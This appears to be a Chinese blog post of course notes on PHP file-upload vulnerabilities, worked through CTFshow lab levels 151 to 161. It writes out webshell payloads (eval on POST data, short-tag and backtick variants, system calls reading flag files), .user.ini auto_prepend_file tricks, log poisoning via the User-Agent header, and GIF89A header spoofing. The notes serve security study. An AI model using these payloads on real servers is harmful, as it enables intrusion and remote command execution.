day31 文件上传&js验证&mime&user.ini&语言特性

最新推荐文章于 2024-09-11 15:33:18 发布
最新推荐文章于 2024-09-11 15:33:18 发布
阅读量547 收藏 1
点赞数 1
分类专栏: 小迪网安笔记 文章标签: javascript php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hesysd/article/details/127979987
版权

前言

#知识点:

1、文件上传-前端验证

2、文件上传-黑白名单

3、文件上传-user.ini妙用

4、文件上传-PHP语言特性

#详细点:

1、检测层面:前端,后端等

2、检测内容:文件头,完整性,二次渲染等

3、检测后缀:黑名单,白名单,MIME检测等

4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

#本章课程内容:

1、文件上传-CTF赛题知识点

2、文件上传-中间件解析&编辑器安全

3、文件上传-实例CMS文件上传安全分析

#前置:

后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)

如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门

CTFshow 靶场实战

151-JS验证

在前端对代码进行了验证,这时候就需要修改前端验证即可

152-JS验证+MIME

Content-Type: image/png

加入了MIME的验证

153-JS验证+user.ini

https://www.cnblogs.com/NineOne/p/14033391.html

.user.ini

首先介绍php.ini文件,php有很多配置,并可以在php.ini中设置。在每个正规的网站里,都会由这样一个文件,而且每次运行PHP文件时,都会去读取这个配置文件,来设置PHP的相关规则。
这些配置可以分为四种:

我感觉是按重要程度分类了,比如关乎到系统一类的配置,那一类的全部配置,都属于“PHP_INI_SYSTEM”。它只能在,像php.ini这样的“厉害”的文件里可以设定。而其他的三类不怎么重要的配置,除了可以在php.ini中设定外,还可以在其它类似的文件中设定,其中就包括.user.ini文件。

实际上,除了PHP_INI_SYSTEM以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。

这里就很清楚了,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)

其中有两个配置,可以用来制造后门:
auto_append_file、auto_prepend_file
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:

auto_prepend_file=test.jpg

或者

auto_append_file=test.jpg

然后将图片马传上去,再访问index.php,注意是上传目录下的index.php,执行任意命令即可,也可蚁剑连接

.user.ini:auto_prepend_file=test.png

test.png:<?php eval($_POST[x]);?>

首先先上传一个".user.ini"的文件,里面写着包含指定的图马。然后直接访问index.php即可(前提访问的文件必须让user.ini生效”

154 155-JS验证+user.ini+短标签

php的不同写法

<?echo'123';?>//前提是开启配置参数short_open_tags=on

<?=(表达式)?>//不需要开启参数设置

<%echo'123';%>//前提是开启配置参数asp_tags=on

<script language=”php”>echo'1';</script>//不需要修改参数开关

.user.ini:auto_prepend_file=test.png

test.png:<?=eval($_POST[x]);?>

他这里对内容进行了检测,过滤了<?php 这个整体,只要出现就拒绝,这时候就要考虑其他语言或者不用<?php 实现php代码,这里呢就是用的短标签

156JS验证+user.ini+短标签+过滤

.user.ini:auto_prepend_file=test.png

test.png:<?=eval($_POST{x});?>//这里是过滤了[]

155关是对后缀进行验证,用.user.ini即可

157-158-159JS验证+user.ini+短标签+过滤

使用反引号运算符的效果与函数 shell_exec()相同

.user.ini:auto_prepend_file=test.png //这里过滤了正则表达式和php ,所以直接读取flag

test.png:<?=system('tac ../fl*')?>//直接调用php的函数system

test.png:<?echo`tac /var/www/html/f*`?>//''这里是运用php的执行运算符' '

160JS验证+user.ini+短标签+过滤

包含默认日志,日志记录UA头,UA头写后门代码

.user.ini:auto_prepend_file=test.png

test.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?>这里首先先上传一个包含默认日志的文件,然后再上传一个UA头修改后的文件,将恶意代码写入日志里面。

161JS验证+user.ini+短标签+过滤+文件头

文件头部检测是否为图片格式文件

.user.ini:GIF89A auto_prepend_file=test.png

test.png:GIF89A<?=include"/var/lo"."g/nginx/access.lo"."g"?>

匿名用户0x3c
关注
专栏目录
【grafana 】mac端grafana配置的文件 grafana.ini 及login
突围
08-04 265
grafana.ini
Grafana基础:配置文件与说明
热门推荐
知行合一 止于至善
01-19 1万+
这篇文章以6.5.1版本的Grafana为例,对于Grafana配置文件的使用进行介绍。
如何在js中对上传的文件类型进行校验
cxfjava的博客
01-11 2953
1.先获取到文件   var file_url = document.getElementById("file_url").files[0];  2.获取到文件名称,对后缀(如PDF)进行校验   var name =file_url.name;     var file_name=name.split(".")[name.split(".").length-1];          if(fil...
.user.ini配置文件
m0_52051132的博客
12-10 1166
user.ini。它比.htaccess 用的更广,不管服务器是 nginx/apache/IIS,当使用 CGI/.user.ini 文件作用:所有的 php 文件都自动包含 test.jpg 文件。.user.ini 相当于一个用。类似于 apache 的.htaccess,但语法与.htacces 不同,语法跟 php.ini 一致。FastCGI 来解析 php 时,php 会优先搜索目录下所有的.ini 文件,并应用其中的配置。再上传一个内容为 php 一句话脚本,命名为 test.jpg。
文件上传
Y-Y-K的博客
04-15 959
文件上传漏洞分类: 1.JS检测绕过攻击 1)通过浏览器插件,删除检测js代码 2)上传后抓包,修改为php等可用后缀 2.文件后缀绕过分析攻击(iis,apache等) 1)apache可解析以.php,.phtml为后缀的文件 2)apache的解析顺序问题,其从右到左进行解析,例如木马.php我们不可上传,且.我们知道qwe为不可解析的后缀,我们可以构造木马.php.qwe可进行上传 3)i...
[极客大挑战 2019]Upload——php短标签
m0_46607055的博客
09-03 1691
目录 题目信息 核心知识点(一)——php短标签 核心知识点(二)——GIF89a图片头文件欺骗 核心知识点(三)——phtml 解题步骤 题目信息 尝试一句话木马后发现,文件内容不能有 <? ,后缀不能是php 核心知识点(一)——php短标签 php短标签 <? echo '123';?> #前提是开启配置参数short_open_tags=on <?=(表达式)?> 等价于 <?php echo (表达式)?> #不需要开启参.
ctfshow_文件上传
qq_45951598的博客
02-04 684
文章目录web151WEB152WEB153WEB154WEB155 web151 禁用js WEB152 burp改包 WEB153 这里利用.user.ini. 先写好一个.user.ini内容如下: 在写一个shell.png 通过burp上传访问upload页面即可,接下来用蚂蚁剑连接。 WEB154 这里考的是短标签 和上面一样,只是把图片里面的内容改成短标签风格即可 <?=eval($_POST[1]);?> WEB155 和上题一样 ...
[红日安全]Web安全Day5 - 任意文件上传实战攻防
hongrisec的博客
02-26 1242
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
Golang优秀开源项目汇总, 10大流行Go语言开源项目, golang 开源项目全集(golang/go/wiki/Projects), GitHub上优秀的Go开源项目...
weixin_34245082的博客
05-08 6081
  Golang优秀开源项目汇总(持续更新。。。)我把这个汇总放在github上了, 后面更新也会在github上更新。 https://github.com/hackstoic/golang-open-source-projects  。 欢迎fork, star , watch, 提issue。    资料参考来源:http://studygolang.com/projects 监控...
CTFshow | 文件上传
m0_60651303的博客
08-04 789
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传。文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
【CTF】文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 5639
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
文件上传(前端JS检测)详解
qq_22132931的博客
10-21 1710
代码审计:文件上传(前端JS检测)绕过
[CISCN2019 总决赛 Day2 Web1]Easyweb
D.MIND 的博客
04-20 323
文章目录源码泄露:分析源码SQL盲注文件上传——短标签 源码泄露: 常规访问一下robots.txt。发现有提示bak备份文件,但没有明确是哪一个文件。这里我按照常规做法尝试index.php.bak没成功,然后一直在哪乱试,脑子wat了居然没去看网页源码,还是太菜了。其实图片就来自于image.php,自然是该文件了…访问image.php.bak下载到源码 分析源码 //config.php <?php include "config.php"; $id=isset($_GET["id"])?
WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性
m0_65336233的博客
10-11 608
WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性
CTFSHOW文件上传
羽的博客
11-19 9061
151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀 152
常见文件上传漏洞利用
weixin_44414845的博客
12-14 4192
文件上传漏洞利用一、常见文件上传绕过方法1.javascript验证突破2.大小写突破3.服务器文件扩展名检测(不符合服务器端规定规则则不让上传)4.特殊后缀名绕过5.MIME类型6.文件内容检测7.图片马8.使用分布式配置9.文件截断10.编辑器漏洞1)ckfinder2)FCKeditor11.服务器解析漏洞1)apache解析漏洞未知后缀解析漏洞换行解析漏洞2)IIS6.0解析漏洞目录解析 ...
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 7016
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1222
CTFshow-文件上传
js中【Worker】相关知识点详细解读
最新发布
2301_79858914的博客
09-11 856
JavaScript 中的 Worker 是一个可以在后台线程中运行代码的 API,这样可以避免主线程(通常是 UI 线程)被阻塞。使用 Worker 时,JavaScript 可以在多线程环境中工作,解决了单线程的瓶颈问题。通常情况下,JavaScript 是单线程的,也就是所有的代码(包括 DOM 操作和事件处理等)都在同一个线程里执行。如果某段代码需要大量计算,或者运行时间过长,会阻塞整个页面,导致界面卡顿甚至崩溃。Worker提供了一种将复杂或耗时的任务分配到后台线程执行的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值